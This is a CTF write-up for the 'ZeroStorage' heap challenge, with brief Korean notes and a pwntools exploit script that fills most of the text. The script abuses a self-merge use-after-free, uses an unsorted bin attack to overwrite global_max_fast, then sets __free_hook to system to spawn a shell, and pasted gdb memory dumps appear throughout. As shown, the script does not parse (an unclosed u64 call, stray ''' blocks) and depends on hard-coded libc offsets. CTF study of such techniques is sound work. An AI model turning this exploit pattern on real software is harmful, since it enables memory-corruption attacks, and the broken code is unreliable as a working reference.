ZeroStorage

merge에서 취약점 발생: 같은 것을 합칠 수 있음 (UAF)

unsorted bin attack으로 global_max_fast를 덮는다 (global_max_fast 값보다 작은 힙 청크들은 모두 fast bin처럼 사용 가능)

free_hook을 덮고 exploit

from pwn import *
 
def insert(length,data):
        """Drive menu option 1 (insert): send the length as a line, then the raw data.

        `length` is converted with str() and sent line-wise; `data` is sent
        exactly as given after the next ':' prompt (no trailing newline), so
        the caller controls the byte count that reaches the program.
        """
        for reply in ('1', str(length)):
                sla(':', reply)
        sa(':', data)
 
def update(idx,length,data):
        """Drive menu option 2 (update) and send only `data` after the prompt.

        `idx` and `length` are accepted but never transmitted by this wrapper:
        it writes the option number as a line and then the raw payload. Every
        call site passes all three, so whether the binary also prompts for an
        index/length has to be checked against the program itself.
        """
        def choose(option):
                sla(':', option)
        choose('2')
        sa(':', data)
 
def merge(idx1,idx2):
        """Drive menu option 3 (merge): send the two entry indices, one per prompt."""
        replies = ['3', str(idx1), str(idx2)]
        for reply in replies:
                sla(':', reply)
 
def delete(idx):
        """Drive menu option 4 (delete) for entry `idx`."""
        for reply in ('4', str(idx)):
                sla(':', reply)
 
def view(idx):
        """Drive menu option 5 (view) for entry `idx`; output is left for the caller to read."""
        for reply in ('5', str(idx)):
                sla(':', reply)
 
def list():
        """Drive menu option 6 (list).

        NOTE: this name shadows the builtin `list` for the rest of the module;
        it is kept because the script refers to it by this name.
        """
        option = '6'
        sla(':', option)
 
# Exploit driver for the local ./zerostorage binary. The page's notes above give
# the intent (self-merge UAF -> unsorted-bin write over global_max_fast ->
# __free_hook). As pasted, the file does not run: the u64(...) call below is
# never closed, and the pasted memory dumps further down are wrapped in an odd
# number of ''' markers. String/bytes usage (e.g. 'A'*0x40 to sendafter) looks
# like Python 2 era pwntools -- TODO confirm before assuming a Python 3 port.
r=process('./zerostorage')  # local process only; no remote target is configured
e=ELF('./zerostorage')
libc=e.libc  # the libc pwntools resolves for the local binary
 
# I/O aliases used by the menu helpers above. They are defined after the helpers,
# so none of the helpers can be called before this point in the file.
sla = lambda x,y : r.sendlineafter(x,y)
sa = lambda x,y : r.sendafter(x,y)
ru = lambda x : r.recvuntil(x)
 
insert(0x40,'A'*0x40)#0
insert(0xf8,'B'*0xf8)#1
 
# Merging entry 0 with itself; per the note at the top of the page this is the
# operation that produces the use-after-free. The result becomes entry 2.
merge(0,0)#2
 
view(2)
 
ru('Entry No.2:\n')
# NOTE(review): this line does not parse -- the u64( call has no closing
# parenthesis, so Python reports a SyntaxError before any of the above runs.
# The subtracted constant is a hard-coded offset for one specific libc build;
# the later addresses use libc.symbols[...] instead, so the two styles are
# inconsistent. Despite its name, libc_leak is used below as the libc base.
libc_leak = u64(ru('\x7f')+'\x00\x00'- 0x3c4b78
log.info(hex(libc_leak))
 
#global_max_fast edit
# Another hard-coded offset (not taken from libc.symbols). Overwriting this
# variable is the unsorted-bin technique named in the page notes; newer glibc
# releases added integrity checks on unsorted chunks that reject this kind of
# write -- confirm the target libc version before reasoning about this step.
global_max_fast = libc_leak + 0x3c67f8
log.info('Global_max_fast : '+hex(global_max_fast))
 
update(2,0x20,p64(0xdeadbeef)+p64(global_max_fast-0x10)+'A'*0x10)
insert(0x10,'/bin/sh\x00'+'\x00'*0x8)#0
 
'''
0x7faab01147e8 <free_list>:     0x00000000      0x00000000      0x00000000      0x00000000
insert(0x10,'/bin/sh\x00'+'\x00'*0x8)#0
'''
0x7faab01147e8 <free_list>:     0x00000000      0x00000000      0x00000000      0x00000000
0x7faab01147f8 <global_max_fast>:       0xb0112b78      0x00007faa      0x00000000      0x00000000
0x7faab0114808 <root>:  0x00000000      0x00000000      0x00000000      0x00000000
0x7faab0114818 <old_realloc_hook>:      0x00000000      0x00000000      0x00000000      0x00000000
0x7faab0114828 <old_malloc_hook>:       0x00000000      0x00000000      0x00000000      0x00000000
0x7faab0114838 <added_atexit_handler.9387>:     0x00000000      0x00000000      0x00000000      0x00000000
'''
#update(2,0x20,p64(libc_leak+0x3c4b78)*2+'A'*0x10)
# Second self-merge, this time on entry 1; the merged result is entry 3.
merge(1,1)#3
# Symbol-based addresses, in contrast to the raw offsets used for the leak
# above. __free_hook is no longer exported in glibc 2.34+, so this lookup
# raises KeyError on recent libcs.
free_hook = libc_leak + libc.symbols['__free_hook']
# Named "oneshot" but it resolves system(), not a one_gadget address; the
# '/bin/sh\x00' entry inserted earlier is what that choice relies on.
oneshot = libc_leak + libc.symbols['system']
log.info(hex(free_hook))
log.info(hex(oneshot))
'''
0x7fb2faf3574f0x00000000      0x00000000      0x00000200      0x00000000
0x7fb2faf3575f0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf3576f <list_all_lock+15>:      0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf3577f <_IO_stdfile_2_lock+15>0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf3578f <_IO_stdfile_1_lock+15>0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf3579f <_IO_stdfile_0_lock+15>0x00000000      0x00000000      0x00000000      0x00000000
0x7fb2faf357af <__free_hook+7>0x00000000      0x00000000      0x00000000      0x00000000
'''
# Final stage. The -0x59 / 0x49 adjustments are hand-tuned against the memory
# dump pasted above for one libc layout; nothing in the script derives them.
update(3,0x1f8,p64(free_hook-0x59)+p64(0xdeadbeef)+'A'*(0x1f8-0x10))
insert(0x1f8,p64(free_hook-0x59)+'\x00'*(0x1f8-0x8))
insert(0x1f8,'\x00'*0x49+p64(oneshot)+'\x00'*(0x1f8-(0x49+8)))
delete(0)  # frees entry 0, the '/bin/sh\x00' entry inserted earlier
r.interactive()